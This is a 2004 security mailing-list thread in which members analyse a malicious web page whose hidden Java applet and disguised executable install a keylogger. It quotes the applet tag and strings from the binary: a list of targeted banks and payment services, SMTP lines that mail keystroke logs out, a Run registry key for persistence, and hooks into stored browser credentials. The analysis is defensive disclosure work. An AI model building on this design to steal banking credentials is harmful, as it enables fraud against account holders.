this is a keylogger that will mail out your intresting logs to some russian address! so beware of this one,
but what i couldent understand is how is this file executed ? -aditya > -----Original Message----- > From: [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED] Behalf Of > [EMAIL PROTECTED] > Sent: Sunday, February 15, 2004 11:40 PM > To: [EMAIL PROTECTED] > Subject: [Full-Disclosure] Re: > http://federalpolice.com:[EMAIL PROTECTED] > > > From the source of that page: > > APPLET ARCHIVE="javautil.zip" CODE="BlackBox.class" WIDTH=1 HEIGHT=1 > > BlackBox.class is detected immediately by my virusscanner as > ClassLoader/E, more > info: > http://www.viruslibrary.com/virusinfo/Trojan.Java.ClassLoader.htm > > The javautil.zip appears to be an exe file renamed to zip. The > exe is compressed with > FSG. > > Interresting pieces of output from strings on the decompressed exe: > > > ----------------------------------------------BEGIN > HookerDll.Dll > Install > Uninstall > EDIT > %s\%s > WVS3 > \kgn.txt > Hooker.dll > Install > Uninstall > Westpac > bendigo > Bendigo > e-bendigo > e-Bendigo > commbank > Commonwealth > NetBank > Citibank > Bank of America > e-gold > e-bullion > e-Bullion > evocash > EVOCash > EVOcash > intgold > INTGold > paypal > PayPal > bankwest > Bank West > BankWest > National Internet Banking > cibc > CIBC > scotiabank > ScotiaBank > Scotia Bank > bank of montreal > Bank of Montreal > royalbank > Royal Bank > RoyalBank > tdwaterhouse > TD Canada Trust > TD Waterhouse > president's choice > President's Choice > President Choice > suncorpmetway > Suncorp > macquarie > Macquarie > INTgold > 1mdc > 1MDC > TD Waterhouse > goldmoney > GoldMoney > goldgrams > pecunix > Pecunix > Pecun!x > hyperwallet > HyperWallet > Wells Fargo > Bank One > Banesto > CAIXA > SunTrust > Sun Trust > Discover Card > Washington Mutual > Wachovia > desjardins > Chase > 0+060F0 > 1$11161J1U1i1 > 2.2I2\2 > 3'3,3E3c3h3r3 > 4%42484>4D4J4P4V4\4b4h4n4t4z4 > DATA > EHLO localhost > Subject: KeyLog from (%s) > MAIL FROM:<[EMAIL PROTECTED]> > RCPT TO:<[EMAIL PROTECTED]> > SOFTWARE\Microsoft\Windows\CurrentVersion\Run > open > pstorec.dll > PStoreCreateInstance > internet explorer > http:// > wininetcachecredentials > Cookie: > ----------------------------------------------END > > I think you can draw your own conclusions about this file. > > Niels > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > ________________________________________________________________________ Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
